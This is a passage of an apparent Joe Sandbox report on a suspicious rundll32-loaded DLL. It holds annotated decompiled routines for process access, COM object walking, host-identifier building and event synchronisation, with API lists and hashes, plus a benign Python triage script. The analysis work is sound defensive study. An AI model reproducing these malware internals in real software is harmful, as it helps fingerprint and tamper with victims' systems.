                                					_t6 = GetCurrentProcessId();
                                					 *0x4a4d258 = _t6;
                                					 *0x4a4d264 = _a4;
                                					/* 0x10047a = SYNCHRONIZE | PROCESS_QUERY_INFORMATION | PROCESS_DUP_HANDLE |
                                					   PROCESS_VM_WRITE | PROCESS_VM_READ | PROCESS_VM_OPERATION |
                                					   PROCESS_CREATE_THREAD, requested on the sample's own PID */
                                					_t7 = OpenProcess(0x10047a, 0, _t6);
                                					 *0x4a4d254 = _t7;
                                					if(_t7 == 0) {
                                						/* fall back to -1, the current-process pseudo-handle value */
                                						 *0x4a4d254 =  *0x4a4d254 | 0xffffffff;
                                					}
                                					return 0;
                                				}
                                				if(_t4 >> 8 > 0) {
                                					goto L5;
                                				}
                                				_t15 = _t4 - _t4;
                                				goto L4;
                                			}

                                Instruction address range: 0x04a49ec3 - 0x04a49f2a

                                APIs
                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,04A427C3,?,?,00000001,?,?,?,04A47F25,?), ref: 04A49EC3
                                • GetVersion.KERNEL32(?,00000001,?,?,?,04A47F25,?), ref: 04A49ED2
                                • GetCurrentProcessId.KERNEL32(?,00000001,?,?,?,04A47F25,?), ref: 04A49EEE
                                • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001,?,?,?,04A47F25,?), ref: 04A49F0B
                                • GetLastError.KERNEL32(?,00000001,?,?,?,04A47F25,?), ref: 04A49F2A
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                • String ID:
                                • API String ID: 2270775618-0
                                • Opcode ID: 71ac30f0f4b726a32828a0151362f4071eafe2e33ba45dba3474cf0e6edc81bf
                                • Instruction ID: 1fcd24bbcf6d4f2f3d39e4350d20209293b84c7f005dbb666b84248f57400204
                                • Opcode Fuzzy Hash: 71ac30f0f4b726a32828a0151362f4071eafe2e33ba45dba3474cf0e6edc81bf
                                • Instruction Fuzzy Hash: 16F0C8B86413029BF7248F74A819B1F3BA8E7E0711F100916E546CA1C0E77FE813CB25
                                Uniqueness

                                Uniqueness Score: -1.00%
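The two listings above (the user@computer builder E04A49267 and the initialisation routine E04A49EBB) are the kind of "APIs" summary a triage script can consume without opening the sample. The following Python is an added example and is not part of the Joe Sandbox report or of the analysed DLL: it parses the report's API bullet lines into records, decodes the 0x10047A access mask handed to OpenProcess into named process rights, and flags the GetUserNameW / GetComputerNameW / WideCharToMultiByte(CP_UTF8) sequence that produces the host identifier. The embedded sample text is copied from the listings above; the function names, the data class and the sequence heuristic are this example's own.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed input: the "APIs" bullet lines of E04A49267 and E04A49EBB, copied
# from the report above (one indented "Part of subcall" line included).
REPORT_API_TEXT = """\
• GetUserNameW.ADVAPI32(00000000,04A49CB0), ref: 04A4927B
• GetComputerNameW.KERNEL32(00000000,04A49CB0), ref: 04A49297
  • Part of subcall function 04A41525: RtlAllocateHeap.NTDLL(00000000,00000000,04A41278), ref: 04A41531
• GetUserNameW.ADVAPI32(00000000,04A49CB0), ref: 04A492D1
• GetComputerNameW.KERNEL32(04A49CB0,?), ref: 04A492F4
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,04A49CB0,00000000,04A49CB2,00000000,00000000,?,?,04A49CB0), ref: 04A49317
• CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,04A427C3,?,?,00000001,?,?,?,04A47F25,?), ref: 04A49EC3
• GetVersion.KERNEL32(?,00000001,?,?,?,04A47F25,?), ref: 04A49ED2
• GetCurrentProcessId.KERNEL32(?,00000001,?,?,?,04A47F25,?), ref: 04A49EEE
• OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001,?,?,?,04A47F25,?), ref: 04A49F0B
• GetLastError.KERNEL32(?,00000001,?,?,?,04A47F25,?), ref: 04A49F2A
"""

# One Joe Sandbox API line: optional "Part of subcall function XXXX:" prefix,
# then Api.MODULE(args), ref: call-site address.
_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Optional[int]]   # None where the report printed '?'
    ref: int                    # address of the call site
    subcall: Optional[int]      # parent routine for "Part of subcall" lines, else None

def parse_api_lines(text: str) -> List[ApiCall]:
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = _LINE.match(line)
        if not m:
            continue
        args = [None if a.strip() == "?" else int(a, 16)
                for a in m.group("args").split(",") if a.strip()]
        sub = int(m.group("sub"), 16) if m.group("sub") else None
        calls.append(ApiCall(m.group("api"), m.group("mod"), args,
                             int(m.group("ref"), 16), sub))
    return calls

# Process-specific and standard access-right bits (winnt.h values).
PROCESS_RIGHTS: Dict[int, str] = {
    0x0001: "PROCESS_TERMINATE",          0x0002: "PROCESS_CREATE_THREAD",
    0x0004: "PROCESS_SET_SESSIONID",      0x0008: "PROCESS_VM_OPERATION",
    0x0010: "PROCESS_VM_READ",            0x0020: "PROCESS_VM_WRITE",
    0x0040: "PROCESS_DUP_HANDLE",         0x0080: "PROCESS_CREATE_PROCESS",
    0x0100: "PROCESS_SET_QUOTA",          0x0200: "PROCESS_SET_INFORMATION",
    0x0400: "PROCESS_QUERY_INFORMATION",  0x0800: "PROCESS_SUSPEND_RESUME",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
    0x00010000: "DELETE",                 0x00020000: "READ_CONTROL",
    0x00040000: "WRITE_DAC",              0x00080000: "WRITE_OWNER",
    0x00100000: "SYNCHRONIZE",
}

def decode_process_access(mask: int) -> List[str]:
    """Expand an OpenProcess dwDesiredAccess mask into named rights, low bit first."""
    names = [name for bit, name in sorted(PROCESS_RIGHTS.items()) if mask & bit]
    unknown = mask & ~sum(PROCESS_RIGHTS)   # bits not covered by the table
    if unknown:
        names.append(f"UNKNOWN(0x{unknown:X})")
    return names

def open_process_masks(calls: List[ApiCall]) -> Dict[int, List[str]]:
    """Map each OpenProcess call site to the decoded rights it requests."""
    return {c.ref: decode_process_access(c.args[0])
            for c in calls if c.api == "OpenProcess" and c.args and c.args[0] is not None}

CP_UTF8 = 0xFDE9   # 65001

def host_id_builder_sites(calls: List[ApiCall]) -> List[int]:
    """Heuristic: call sites of WideCharToMultiByte(CP_UTF8, ...) that follow both
    GetUserNameW and GetComputerNameW in listing order, i.e. the user@computer
    identifier construction seen in E04A49267. Subcall lines are ignored."""
    seen = set()
    hits = []
    for c in calls:
        if c.subcall is not None:
            continue
        if c.api in ("GetUserNameW", "GetComputerNameW"):
            seen.add(c.api)
        elif (c.api == "WideCharToMultiByte" and c.args and c.args[0] == CP_UTF8
              and {"GetUserNameW", "GetComputerNameW"} <= seen):
            hits.append(c.ref)
    return hits

if __name__ == "__main__":
    parsed = parse_api_lines(REPORT_API_TEXT)
    for ref, rights in open_process_masks(parsed).items():
        print(f"OpenProcess @ {ref:08X}: {' | '.join(rights)}")
    print("host-id builder at:", [f"{r:08X}" for r in host_id_builder_sites(parsed)])
```

The sequence heuristic deliberately skips "Part of subcall" lines so that a helper's own calls do not satisfy the pattern for its caller; when feeding whole reports, run it once per function block rather than over the concatenated listing.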

                                C-Code - Quality: 46%
                                			E04A44E05(intOrPtr* __eax) {
                                				void* _v8;
                                				WCHAR* _v12;
                                				void* _v16;
                                				char _v20;
                                				void* _v24;
                                				intOrPtr _v28;
                                				void* _v32;
                                				intOrPtr _v40;
                                				short _v48;
                                				intOrPtr _v56;
                                				short _v64;
                                				intOrPtr* _t54;
                                				intOrPtr* _t56;
                                				intOrPtr _t57;
                                				intOrPtr* _t58;
                                				intOrPtr* _t60;
                                				void* _t61;
                                				intOrPtr* _t63;
                                				intOrPtr* _t65;
                                				short _t67;
                                				intOrPtr* _t68;
                                				intOrPtr* _t70;
                                				intOrPtr* _t72;
                                				intOrPtr* _t75;
                                				intOrPtr* _t77;
                                				intOrPtr _t79;
                                				intOrPtr* _t83;
                                				intOrPtr _t103;
                                				intOrPtr _t109;
                                				void* _t118;
                                				void* _t122;
                                				void* _t123;
                                				intOrPtr _t130;
                                
                                				/* COM collection walk: obtain an interface from the object in __eax, look up a
                                				   sub-object by the BSTR built from 0x4a4c290, iterate its items by index and,
                                				   for the item whose name equals the UTF-16 string at _t33 (starts "ov"), call
                                				   vtable slot 0x114 on it. Slot 0 is IUnknown::QueryInterface and slot +8 is
                                				   IUnknown::Release; the APIs list below resolves OLEAUT32 ordinal #2 to
                                				   SysAllocString and #6 to SysFreeString. */
                                				_t123 = _t122 - 0x3c;
                                				_push( &_v8);
                                				_push(__eax);
                                				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
                                				if(_t118 >= 0) {
                                					_t54 = _v8;
                                					_t103 =  *0x4a4d2a8; // 0x40a5a8
                                					_t5 = _t103 + 0x4a4e038; // 0x3050f485  (riid for the QueryInterface below)
                                					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
                                					_t56 = _v8;
                                					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);    /* Release */
                                					if(_t118 >= 0) {
                                						_t57 = SysAllocString(0x4a4c290);
                                						_v28 = _t57;
                                						if(_t57 == 0) {
                                							_t118 = 0x8007000e;   /* E_OUTOFMEMORY */
                                						} else {
                                							_t60 = _v32;
                                							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);   /* lookup by BSTR */
                                							_t118 = _t61;
                                							if(_t118 >= 0) {
                                								_t63 = _v24;
                                								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);   /* _v20 = item count */
                                								if(_t118 >= 0) {
                                									_t130 = _v20;
                                									if(_t130 != 0) {
                                										/* Two 16-byte VARIANTs with vt = 3 (VT_I4); _v40 is the loop index. */
                                										_t67 = 3;
                                										_v64 = _t67;
                                										_v48 = _t67;
                                										_v56 = 0;
                                										_v40 = 0;
                                										if(_t130 > 0) {
                                											while(1) {
                                												_t68 = _v24;
                                												/* the eight movsd copy both VARIANTs onto the stack as by-value
                                												   arguments of the slot-0x2c call (item lookup by index) */
                                												asm("movsd");
                                												asm("movsd");
                                												asm("movsd");
                                												asm("movsd");
                                												_t123 = _t123;
                                												asm("movsd");
                                												asm("movsd");
                                												asm("movsd");
                                												asm("movsd");
                                												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
                                												if(_t118 < 0) {
                                													goto L16;
                                												}
                                												_t70 = _v8;
                                												_t109 =  *0x4a4d2a8; // 0x40a5a8
                                												_t28 = _t109 + 0x4a4e0bc; // 0x3050f1ff  (riid for the item's QueryInterface)
                                												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
                                												if(_t118 >= 0) {
                                													_t75 = _v16;
                                													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);   /* _v12 = item name (BSTR) */
                                													if(_t118 >= 0 && _v12 != 0) {
                                														_t79 =  *0x4a4d2a8; // 0x40a5a8
                                														_t33 = _t79 + 0x4a4e078; // 0x76006f
                                														if(lstrcmpW(_v12, _t33) == 0) {
                                															_t83 = _v16;
                                															 *((intOrPtr*)( *_t83 + 0x114))(_t83);   /* action on the matching item */
                                														}
                                														SysFreeString(_v12);
                                													}
                                													_t77 = _v16;
                                													 *((intOrPtr*)( *_t77 + 8))(_t77);    /* Release */
                                												}
                                												_t72 = _v8;
                                												 *((intOrPtr*)( *_t72 + 8))(_t72);    /* Release */
                                												_v40 = _v40 + 1;
                                												if(_v40 < _v20) {
                                													continue;
                                												}
                                												goto L16;
                                											}
                                										}
                                									}
                                								}
                                								L16:
                                								_t65 = _v24;
                                								 *((intOrPtr*)( *_t65 + 8))(_t65);    /* Release */
                                							}
                                							SysFreeString(_v28);
                                						}
                                						_t58 = _v32;
                                						 *((intOrPtr*)( *_t58 + 8))(_t58);    /* Release */
                                					}
                                				}
                                				return _t118;
                                			}

                                Instruction address range: 0x04a44e0a - 0x04a44f96

                                APIs
                                • SysAllocString.OLEAUT32(04A4C290), ref: 04A44E55
                                • lstrcmpW.KERNEL32(00000000,0076006F), ref: 04A44F36
                                • SysFreeString.OLEAUT32(00000000), ref: 04A44F4F
                                • SysFreeString.OLEAUT32(?), ref: 04A44F7E
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: String$Free$Alloclstrcmp
                                • String ID:
                                • API String ID: 1885612795-0
                                • Opcode ID: 3587d354f474e15ddf86f084c4e10a6e63fcc87d12f9fdffa882a0115a228cca
                                • Instruction ID: b61016c1433ed8f884fcf3f1c50a86f3ab799f2c2a2fb5c546469245cb351443
                                • Opcode Fuzzy Hash: 3587d354f474e15ddf86f084c4e10a6e63fcc87d12f9fdffa882a0115a228cca
                                • Instruction Fuzzy Hash: 7F514B75D00509EFCB00DFA8C9889AEF7B9FFC8705B158584E915EB254D732AD42CBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • SysAllocString.OLEAUT32(?), ref: 04A413B6
                                • SysFreeString.OLEAUT32(00000000), ref: 04A4149B
                                  • Part of subcall function 04A44E05: SysAllocString.OLEAUT32(04A4C290), ref: 04A44E55
                                • SafeArrayDestroy.OLEAUT32(00000000), ref: 04A414EE
                                • SysFreeString.OLEAUT32(00000000), ref: 04A414FD
                                  • Part of subcall function 04A452B9: Sleep.KERNEL32(000001F4), ref: 04A45301
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: String$AllocFree$ArrayDestroySafeSleep
                                • String ID:
                                • API String ID: 3193056040-0
                                • Opcode ID: 5224b0404dfc273c842d6871e013efb4fa4c3774b152328b9d3c7e10cbd05ad5
                                • Instruction ID: e8dfdfc2ff2aeb14357a543d63796131efea4778a4e1886cd91abccfa9d78813
                                • Opcode Fuzzy Hash: 5224b0404dfc273c842d6871e013efb4fa4c3774b152328b9d3c7e10cbd05ad5
                                • Instruction Fuzzy Hash: 9C519E75900609AFDB01CFA8C948A9EB7B6FFC8710B158829E909DB210DB71ED46CB50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 85%
                                			E04A429ED(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                                				intOrPtr _v8;
                                				intOrPtr _v12;
                                				signed int _v16;
                                				void _v92;
                                				void _v236;
                                				void* _t55;
                                				unsigned int _t56;
                                				signed int _t66;
                                				signed int _t74;
                                				void* _t76;
                                				signed int _t79;
                                				void* _t81;
                                				void* _t92;
                                				void* _t96;
                                				signed int* _t99;
                                				signed int _t101;
                                				signed int _t103;
                                				void* _t107;
                                
                                				_t92 = _a12;
                                				_t101 = __eax;
                                				_t55 = E04A48B37(_a16, _t92);
                                				_t79 = _t55;
                                				if(_t79 == 0) {
                                					L18:
                                					return _t55;
                                				}
                                				_t56 =  *(_t92 + _t79 * 4 - 4);
                                				_t81 = 0;
                                				_t96 = 0x20;
                                				if(_t56 == 0) {
                                					L4:
                                					_t97 = _t96 - _t81;
                                					_v12 = _t96 - _t81;
                                					E04A44AA4(_t79,  &_v236);
                                					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E04A42F01(_t101,  &_v236, _a8, _t96 - _t81);
                                					E04A42F01(_t79,  &_v92, _a12, _t97);
                                					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
                                					_t66 = E04A44AA4(_t101, 0x4a4d1b0);
                                					_t103 = _t101 - _t79;
                                					_a8 = _t103;
                                					if(_t103 < 0) {
                                						L17:
                                						E04A44AA4(_a16, _a4);
                                						E04A428BA(_t79,  &_v236, _a4, _t97);
                                						memset( &_v236, 0, 0x8c);
                                						_t55 = memset( &_v92, 0, 0x44);
                                						goto L18;
                                					}
                                					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
                                					do {
                                						if(_v8 != 0xffffffff) {
                                							_push(1);
                                							_push(0);
                                							_push(0);
                                							_push( *_t99);
                                							L04A4AF6E();
                                							_t74 = _t66 +  *(_t99 - 4);
                                							asm("adc edx, esi");
                                							_push(0);
                                							_push(_v8 + 1);
                                							_push(_t92);
                                							_push(_t74);
                                							L04A4AF68();
                                							if(_t92 > 0 || _t74 > 0xffffffff) {
                                								_t74 = _t74 | 0xffffffff;
                                								_v16 = _v16 & 0x00000000;
                                							}
                                						} else {
                                							_t74 =  *_t99;
                                						}
                                						_t106 = _t107 + _a8 * 4 - 0xe8;
                                						_a12 = _t74;
                                						_t76 = E04A49947(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
                                						while(1) {
                                							 *_t99 =  *_t99 - _t76;
                                							if( *_t99 != 0) {
                                								goto L14;
                                							}
                                							L13:
                                							_t92 =  &_v92;
                                							if(E04A44506(_t79, _t92, _t106) < 0) {
                                								break;
                                							}
                                							L14:
                                							_a12 = _a12 + 1;
                                							_t76 = E04A4A708(_t79,  &_v92, _t106, _t106);
                                							 *_t99 =  *_t99 - _t76;
                                							if( *_t99 != 0) {
                                								goto L14;
                                							}
                                							goto L13;
                                						}
                                						_a8 = _a8 - 1;
                                						_t66 = _a12;
                                						_t99 = _t99 - 4;
                                						 *(0x4a4d1b0 + _a8 * 4) = _t66;
                                					} while (_a8 >= 0);
                                					_t97 = _v12;
                                					goto L17;
                                				}
                                				while(_t81 < _t96) {
                                					_t81 = _t81 + 1;
                                					_t56 = _t56 >> 1;
                                					if(_t56 != 0) {
                                						continue;
                                					}
                                					goto L4;
                                				}
                                				goto L4;
                                			}

                                APIs
                                • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 04A42A9A
                                • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 04A42AB0
                                • memset.NTDLL ref: 04A42B50
                                • memset.NTDLL ref: 04A42B60
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: memset$_allmul_aulldiv
                                • String ID:
                                • API String ID: 3041852380-0
                                • Opcode ID: 70da8308fd115e5db83d06ce01378e4084fdfa995d3f96b6a987ee20588dc3d8
                                • Instruction ID: d5059cf8c838a74174d11981b28ee310f25512ffa8c18cbdf6d220033c6769c0
                                • Opcode Fuzzy Hash: 70da8308fd115e5db83d06ce01378e4084fdfa995d3f96b6a987ee20588dc3d8
                                • Instruction Fuzzy Hash: B8415F72A00209ABDB20DFA8CD40BDE7775EFC8754F508569B919AB180DB70B955CB50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 87%
                                			E04A46150(signed int _a4, signed int* _a8) {
                                				void* __ecx;
                                				void* __edi;
                                				signed int _t6;
                                				intOrPtr _t8;
                                				intOrPtr _t12;
                                				short* _t19;
                                				void* _t25;
                                				signed int* _t28;
                                				CHAR* _t30;
                                				long _t31;
                                				intOrPtr* _t32;
                                
                                				_t6 =  *0x4a4d270; // 0xd448b889
                                				_t32 = _a4;
                                				_a4 = _t6 ^ 0x109a6410;
                                				_t8 =  *0x4a4d2a8; // 0x40a5a8
                                				_t3 = _t8 + 0x4a4e87e; // 0x61636f4c
                                				_t25 = 0;
                                				_t30 = E04A410B1(_t3, 1);
                                				if(_t30 != 0) {
                                					_t25 = CreateEventA(0x4a4d2ac, 1, 0, _t30);
                                					E04A48B22(_t30);
                                				}
                                				_t12 =  *0x4a4d25c; // 0x4000000a
                                				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E04A48F1B() != 0) {
                                					L12:
                                					_t28 = _a8;
                                					if(_t28 != 0) {
                                						 *_t28 =  *_t28 | 0x00000001;
                                					}
                                					_t31 = E04A43485(_t32, 0);
                                					if(_t31 == 0 && _t25 != 0) {
                                						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                					}
                                					if(_t28 != 0 && _t31 != 0) {
                                						 *_t28 =  *_t28 & 0xfffffffe;
                                					}
                                					goto L20;
                                				} else {
                                					_t19 =  *0x4a4d10c( *_t32, 0x20);
                                					if(_t19 != 0) {
                                						 *_t19 = 0;
                                						_t19 = _t19 + 2;
                                					}
                                					_t31 = E04A48B7B(0,  *_t32, _t19, 0);
                                					if(_t31 == 0) {
                                						if(_t25 == 0) {
                                							L22:
                                							return _t31;
                                						}
                                						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                						if(_t31 == 0) {
                                							L20:
                                							if(_t25 != 0) {
                                								CloseHandle(_t25);
                                							}
                                							goto L22;
                                						}
                                					}
                                					goto L12;
                                				}
                                			}

                                APIs
                                  • Part of subcall function 04A410B1: lstrlen.KERNEL32(00000005,00000000,69B25F44,00000027,00000000,04E59D18,00000000,?,?,69B25F44,00000005,04A4D00C,?,?,04A430FE), ref: 04A410E7
                                  • Part of subcall function 04A410B1: lstrcpy.KERNEL32(00000000,00000000), ref: 04A4110B
                                  • Part of subcall function 04A410B1: lstrcat.KERNEL32(00000000,00000000), ref: 04A41113
                                • CreateEventA.KERNEL32(04A4D2AC,00000001,00000000,00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,04A4991F,?,00000001,?), ref: 04A46191
                                  • Part of subcall function 04A48B22: RtlFreeHeap.NTDLL(00000000,00000000,04A4131A,00000000,?,?,00000000), ref: 04A48B2E
                                • WaitForSingleObject.KERNEL32(00000000,00004E20,04A4991F,00000000,00000000,?,00000000,?,04A4991F,?,00000001,?,?,?,?,04A47D37), ref: 04A461F1
                                • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,00000001,?,00000000,?,04A4991F,?,00000001,?), ref: 04A4621F
                                • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,04A4991F,?,00000001,?,?,?,?,04A47D37), ref: 04A46237
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                • String ID:
                                • API String ID: 73268831-0
                                • Opcode ID: 11b2814db2ff18bec692cc203a1aa6b6829a4806bb335ebca5dad23ac48a787d
                                • Instruction ID: f110445f419119b4d63b677a6d1a6583ab602344c4cb9a967ab9d4a114aede0e
                                • Opcode Fuzzy Hash: 11b2814db2ff18bec692cc203a1aa6b6829a4806bb335ebca5dad23ac48a787d
                                • Instruction Fuzzy Hash: 9A212332A023116BE7316FAC9C84A6F7399EBDAB21F150629FD46DF101DB7DEC428650
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 40%
                                			E04A49870(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
                                				intOrPtr _v12;
                                				void* _v16;
                                				void* _v28;
                                				char _v32;
                                				void* __esi;
                                				void* _t29;
                                				void* _t38;
                                				signed int* _t39;
                                				void* _t40;
                                
                                				_t36 = __ecx;
                                				_v32 = 0;
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosd");
                                				_v12 = _a4;
                                				_t38 = E04A42931(__ecx,  &_v32);
                                				if(_t38 != 0) {
                                					L12:
                                					_t39 = _a8;
                                					L13:
                                					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
                                						_t16 =  &(_t39[1]); // 0x5
                                						_t23 = _t16;
                                						if( *_t16 != 0) {
                                							E04A48DAB(_t23);
                                						}
                                					}
                                					return _t38;
                                				}
                                				if(E04A4155A(0x40,  &_v16) != 0) {
                                					_v16 = 0;
                                				}
                                				_t40 = CreateEventA(0x4a4d2ac, 1, 0,  *0x4a4d344);
                                				if(_t40 != 0) {
                                					SetEvent(_t40);
                                					Sleep(0xbb8);
                                					CloseHandle(_t40);
                                				}
                                				_push( &_v32);
                                				if(_a12 == 0) {
                                					_t29 = E04A45BC0(_t36);
                                				} else {
                                					_push(0);
                                					_push(0);
                                					_push(0);
                                					_push(0);
                                					_push(0);
                                					_t29 = E04A44B2A(_t36);
                                				}
                                				_t41 = _v16;
                                				_t38 = _t29;
                                				if(_v16 != 0) {
                                					E04A44FF0(_t41);
                                				}
                                				if(_t38 != 0) {
                                					goto L12;
                                				} else {
                                					_t39 = _a8;
                                					_t38 = E04A46150( &_v32, _t39);
                                					goto L13;
                                				}
                                			}

                                APIs
                                • CreateEventA.KERNEL32(04A4D2AC,00000001,00000000,00000040,00000001,?,74E5F710,00000000,74E5F730,?,?,?,04A47D37,?,00000001,?), ref: 04A498C1
                                • SetEvent.KERNEL32(00000000,?,?,?,04A47D37,?,00000001,?,00000002,?,?,04A4312C,?), ref: 04A498CE
                                • Sleep.KERNEL32(00000BB8,?,?,?,04A47D37,?,00000001,?,00000002,?,?,04A4312C,?), ref: 04A498D9
                                • CloseHandle.KERNEL32(00000000,?,?,?,04A47D37,?,00000001,?,00000002,?,?,04A4312C,?), ref: 04A498E0
                                  • Part of subcall function 04A45BC0: WaitForSingleObject.KERNEL32(00000000,?,?,?,04A49900,?,04A49900,?,?,?,?,?,04A49900,?), ref: 04A45C9A
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                                • String ID:
                                • API String ID: 2559942907-0
                                • Opcode ID: 30049cb54acdbd1e43e54076ef075e1e5a04bf1888c5e7bdd647c75b8f2e3904
                                • Instruction ID: 9108264a0b5c2e12dc42a1c84959b65cbda2ff2aef74f6983f41b50461f3720f
                                • Opcode Fuzzy Hash: 30049cb54acdbd1e43e54076ef075e1e5a04bf1888c5e7bdd647c75b8f2e3904
                                • Instruction Fuzzy Hash: A421A4B7D00219ABDB20AFF489849DF77BCEFC8364B014425EA15E7200E775B9468BA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 78%
                                			E04A45F58(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
                                				intOrPtr _v8;
                                				void* _v12;
                                				void* _v16;
                                				intOrPtr _t26;
                                				intOrPtr* _t28;
                                				intOrPtr _t31;
                                				intOrPtr* _t32;
                                				void* _t39;
                                				int _t46;
                                				intOrPtr* _t47;
                                				int _t48;
                                
                                				_t47 = __eax;
                                				_push( &_v12);
                                				_push(__eax);
                                				_t39 = 0;
                                				_t46 = 0;
                                				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
                                				_v8 = _t26;
                                				if(_t26 < 0) {
                                					L13:
                                					return _v8;
                                				}
                                				if(_v12 == 0) {
                                					Sleep(0xc8);
